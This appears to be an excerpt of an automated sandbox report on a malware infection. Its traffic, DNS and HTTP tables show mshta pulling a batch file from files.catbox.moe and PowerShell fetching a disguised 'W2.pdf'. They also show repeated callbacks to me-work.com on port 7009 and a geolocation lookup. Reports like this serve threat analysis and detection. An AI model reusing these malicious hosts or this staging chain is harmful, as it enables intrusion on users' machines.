                                                                  Jan 7, 2025 18:13:04.865787029 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.865845919 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866216898 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866234064 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866293907 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866298914 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866353989 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866481066 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866497040 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866625071 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.866630077 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.866702080 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918411016 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918431044 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918482065 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918488979 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.918525934 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.918538094 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:04.951124907 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.951143026 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:04.951205969 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.155345917 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.243947983 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.459333897 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.459410906 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:05.887339115 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:05.887453079 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:06.751332998 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:06.751399040 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103913069 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103923082 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103933096 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103974104 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.103981018 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.103991985 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104001045 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104021072 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104026079 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104041100 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104052067 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104062080 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104072094 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104080915 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104089975 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104101896 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104101896 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104115009 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104123116 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104131937 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104151964 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104156971 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104165077 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104192972 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104206085 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104216099 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104234934 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104240894 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104274988 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104285002 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104305983 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104311943 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104325056 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104347944 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104355097 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104363918 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104386091 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104393959 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.104437113 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.104460955 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.315330982 CET44349738193.26.115.39192.168.2.4
                                                                  Jan 7, 2025 18:13:07.315392017 CET49738443192.168.2.4193.26.115.39
                                                                  Jan 7, 2025 18:13:07.523333073 CET44349738193.26.115.39192.168.2.4
Jan 7, 2025 18:13:07.523387909 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.659578085 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.659590960 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.659672976 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.673142910 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.673147917 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673165083 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673182964 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673345089 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.673352957 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673362017 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673378944 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673404932 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.673418045 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.673481941 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.673588991 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.870667934 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.870683908 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.870764971 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.885957003 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.885961056 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.885978937 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.885997057 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.886007071 CET | 443 | 49738 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:07.886168003 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:07.886254072 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:08.274175882 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:08.281905890 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:08.536396980 CET | 49738 | 443 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:54.676255941 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:54.681060076 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:54.682718992 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:54.687796116 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:54.692553997 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.257489920 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.311475039 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:55.394946098 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.399101973 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:55.403860092 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.403929949 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:55.408725977 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.629553080 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.630891085 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:55.635737896 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.727293015 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:55.775119066 CET | 49758 | 80 | 192.168.2.4 | 178.237.33.50
Jan 7, 2025 18:13:55.779930115 CET | 80 | 49758 | 178.237.33.50 | 192.168.2.4
Jan 7, 2025 18:13:55.780205011 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:55.780242920 CET | 49758 | 80 | 192.168.2.4 | 178.237.33.50
Jan 7, 2025 18:13:55.780370951 CET | 49758 | 80 | 192.168.2.4 | 178.237.33.50
Jan 7, 2025 18:13:55.785161018 CET | 80 | 49758 | 178.237.33.50 | 192.168.2.4
Jan 7, 2025 18:13:56.429481030 CET | 80 | 49758 | 178.237.33.50 | 192.168.2.4
Jan 7, 2025 18:13:56.432073116 CET | 49758 | 80 | 192.168.2.4 | 178.237.33.50
Jan 7, 2025 18:13:56.442120075 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:13:56.446989059 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:13:57.429505110 CET | 80 | 49758 | 178.237.33.50 | 192.168.2.4
Jan 7, 2025 18:13:57.429683924 CET | 49758 | 80 | 192.168.2.4 | 178.237.33.50
Jan 7, 2025 18:14:11.647881031 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:14:11.649019957 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:14:11.653835058 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:14:41.662075043 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Jan 7, 2025 18:14:41.665317059 CET | 49756 | 7009 | 192.168.2.4 | 193.26.115.39
Jan 7, 2025 18:14:41.670162916 CET | 7009 | 49756 | 193.26.115.39 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2025 18:12:56.079799891 CET | 53102 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:12:56.087198973 CET | 53 | 53102 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:12:59.651398897 CET | 53709 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:12:59.667505980 CET | 53 | 53709 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:13:14.963872910 CET | 60943 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:13:23.263462067 CET | 51546 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:13:23.282586098 CET | 53 | 51546 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:13:43.266180992 CET | 52067 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:13:43.286603928 CET | 53 | 52067 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:13:54.639218092 CET | 58719 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:13:54.673007011 CET | 53 | 58719 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:13:55.761528969 CET | 61670 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:13:55.769001007 CET | 53 | 61670 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:14:19.406017065 CET | 56805 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:14:19.414688110 CET | 53 | 56805 | 1.1.1.1 | 192.168.2.4
Jan 7, 2025 18:14:43.530844927 CET | 55271 | 53 | 192.168.2.4 | 1.1.1.1
Jan 7, 2025 18:14:43.541599035 CET | 53 | 55271 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 7, 2025 18:12:56.079799891 CET | 192.168.2.4 | 1.1.1.1 | 0x7b8f | Standard query (0) | files.catbox.moe | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:12:59.651398897 CET | 192.168.2.4 | 1.1.1.1 | 0xc58b | Standard query (0) | myguyapp.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:14.963872910 CET | 192.168.2.4 | 1.1.1.1 | 0x6907 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:23.263462067 CET | 192.168.2.4 | 1.1.1.1 | 0x5b82 | Standard query (0) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:43.266180992 CET | 192.168.2.4 | 1.1.1.1 | 0x8d7 | Standard query (0) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:54.639218092 CET | 192.168.2.4 | 1.1.1.1 | 0xb1b6 | Standard query (0) | me-work.com | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:55.761528969 CET | 192.168.2.4 | 1.1.1.1 | 0xb198 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:14:19.406017065 CET | 192.168.2.4 | 1.1.1.1 | 0x89b8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:14:43.530844927 CET | 192.168.2.4 | 1.1.1.1 | 0x4007 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 7, 2025 18:12:56.087198973 CET | 1.1.1.1 | 192.168.2.4 | 0x7b8f | No error (0) | files.catbox.moe | | 108.181.20.35 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:12:59.667505980 CET | 1.1.1.1 | 192.168.2.4 | 0xc58b | No error (0) | myguyapp.com | | 193.26.115.39 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:14.580420971 CET | 1.1.1.1 | 192.168.2.4 | 0xaadf | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:14.580420971 CET | 1.1.1.1 | 192.168.2.4 | 0xaadf | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:14.971046925 CET | 1.1.1.1 | 192.168.2.4 | 0x6907 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 7, 2025 18:13:23.282586098 CET | 1.1.1.1 | 192.168.2.4 | 0x5b82 | Name error (3) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:43.286603928 CET | 1.1.1.1 | 192.168.2.4 | 0x8d7 | Name error (3) | ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF | none | none | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:54.673007011 CET | 1.1.1.1 | 192.168.2.4 | 0xb1b6 | No error (0) | me-work.com | | 193.26.115.39 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:13:55.769001007 CET | 1.1.1.1 | 192.168.2.4 | 0xb198 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:14:19.414688110 CET | 1.1.1.1 | 192.168.2.4 | 0x89b8 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Jan 7, 2025 18:14:43.541599035 CET | 1.1.1.1 | 192.168.2.4 | 0x4007 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                  • files.catbox.moe
                                                                  • myguyapp.com
                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49758 | 178.237.33.50 | 80 | 5752 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com

Timestamp | Bytes transferred | Direction | Data
Jan 7, 2025 18:13:55.780370951 CET | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Jan 7, 2025 18:13:56.429481030 CET | 1171 | IN | HTTP/1.1 200 OK
date: Tue, 07 Jan 2025 17:13:56 GMT
server: Apache
content-length: 963
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 108.181.20.35 | 443 | 6164 | C:\Windows\SysWOW64\mshta.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 17:12:57 UTC | 310 | OUT | GET /0o8vth.bat HTTP/1.1
Accept: */*
Accept-Language: en-CH
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: files.catbox.moe
Connection: Keep-Alive
2025-01-07 17:12:57 UTC | 548 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 07 Jan 2025 17:12:57 GMT
Content-Type: application/octet-stream
Content-Length: 5541
Last-Modified: Tue, 07 Jan 2025 14:55:14 GMT
Connection: close
ETag: "677d4052-15a5"
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD
Accept-Ranges: bytes
2025-01-07 17:12:57 UTC | 5541 | IN | Data Raw: 3a 3a 20 e2 96 84 e2 96 84 e2 96 84 e2 96 84 20 20 20 20 e2 96 84 e2 96 84 e2 96 84 20 20 20 20 20 e2 96 84 e2 96 84 e2 96 84 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 93 20 e2 96 84 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 20 20 e2 96 88 e2 96 88 e2 96 91 20 e2 96 88 e2 96 88 20 20 20 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 91 20 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 93 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 20 20 e2 96 88 e2 96 88 e2 96 93 20 20 20 20 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 0d 0a 3a 3a 20 e2 96 93 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 e2 96 92 e2 96 88 e2 96 88 e2 96 88 e2 96 88 e2 96 84 20 20 20 e2 96 93 20
Data Ascii: :: ::


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49735 | 193.26.115.39 | 443 | 7196 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-07 17:13:00 UTC | 163 | OUT | GET /W2.pdf HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: myguyapp.com
Connection: Keep-Alive
2025-01-07 17:13:00 UTC | 283 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 17:13:00 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Sun, 15 Dec 2024 22:53:19 GMT
ETag: "602ec-62956ee20a194"
Accept-Ranges: bytes
Content-Length: 393964
Connection: close
Content-Type: application/pdf
2025-01-07 17:13:00 UTC | 7909 | IN | Data Raw: 25 50 44 46 2d 31 2e 34 0d 25 e2 e3 cf d3 0d 0a 34 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 33 39 33 39 36 34 2f 4f 20 36 2f 45 20 33 36 32 36 31 37 2f 4e 20 31 2f 54 20 33 39 33 37 37 30 2f 48 20 5b 20 31 33 31 36 20 32 33 38 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 78 72 65 66 0d 0a 34 20 35 31 0d 0a 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 35 35 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 36 31 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 32 34 32 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 34 30 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 32 39 31 35 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 33
Data Ascii: %PDF-1.4%4 0 obj<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>endobj xref4 510000000016 00000 n0000001554 00000 n0000001614 00000 n0000002242 00000 n0000002407 00000 n0000002915 00000 n0000003
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 46 51 a8 bb 7a fa 70 70 78 98 2b 02 a5 c0 85 82 87 69 86 e6 3d 94 a5 ea 7d 6a 0c 0c ff a8 e4 34 9d 13 c9 3d fd be a1 91 30 ec b7 c2 23 c4 c6 5e 53 64 fa 4e 9f 37 f6 59 2e c5 c1 4b c5 fd 71 03 6c 3d 78 ba 77 4c 99 1a 5d 31 93 65 1f 8a 27 6b 12 7a 94 a4 4a 4c ca a7 8b 06 43 ba d8 08 72 c4 09 99 52 33 a7 04 a9 f3 a0 8b 82 34 94 ee ed 27 13 e1 8a 96 b4 cb 8c 41 6e c6 1f 95 49 00 46 0d 95 fc f1 d0 92 df dc 9d cc 5d 72 7d b1 75 e1 7c 1a ad 52 15 71 d8 48 f1 68 76 d3 17 c3 94 10 6a 02 6b ee c1 26 dc fc 13 0f 0b 6a 6c 1b cc 55 53 13 1a 0b 2d dd 44 d0 a4 90 a0 47 f3 bd c9 0c 9b 06 c1 89 86 4c e9 82 87 31 68 48 ed c6 3c 81 1d 63 29 28 d4 b0 2e a1 55 84 da 7b cb eb c8 68 aa bc 36 69 32 55 90 fb 7c 7a 45 7c 3c db 7e 07 07 c5 2d 3b db 1c 33 39 4d 22 b8 81 49 25 bb 72
Data Ascii: FQzppx+i=}j4=0#^SdN7Y.Kql=xwL]1e'kzJLCrR34'AnIF]r}u|RqHhvjk&jlUS-DGL1hH<c)(.U{h6i2U|zE|<~-;39M"I%r
2025-01-07 17:13:00 UTC | 16384 | IN | Data Raw: 1a 72 64 20 53 fd af c8 24 18 17 3c 29 e3 fc 1f 48 13 f3 1c 96 6f b3 01 5f 58 5b da ea b7 2f 53 8d a1 e8 fe f2 ea a4 16 7b 01 9c 03 8d 4a b0 5e 1a f9 86 c5 8e 5e ec 81 61 d6 97 23 ec 1b f5 ad 04 26 ca 94 60 b1 1d e7 a3 56 a4 54 d7 0c fa 69 d9 df 47 4c 53 58 2f f5 47 f1 6f b5 f6 2d 5d 3b bb 7e ba a6 0b a4 d9 df 81 8d bf 7f 99 1d eb 03 09 74 ed fc 43 c0 f7 87 d1 30 d7 ed d3 b9 ee 6c 35 fb 7f 96 61 3a 5f 3b 47 34 15 df 74 19 fe 7e ec df 40 bc 88 d7 c7 b6 8d 16 c9 c4 68 07 ec 61 4d ee 20 fe 6f 95 3e e1 79 d2 27 ba 54 a6 07 ab 98 f3 4d 50 49 fd 2b e8 d8 b5 52 05 03 33 63 cc df 33 bf 97 2a 08 15 ef 6a a9 f2 17 73 b6 e6 4b 90 79 4e ee f4 f6 43 8b fc 06 9e 87 67 e0 90 92 39 46 1f 08 56 48 1d d4 c2 15 8a d7 92 e9 cf f3 fd b0 d4 fd af 8c ff 53 37 52 9e b2 b8 77 c0
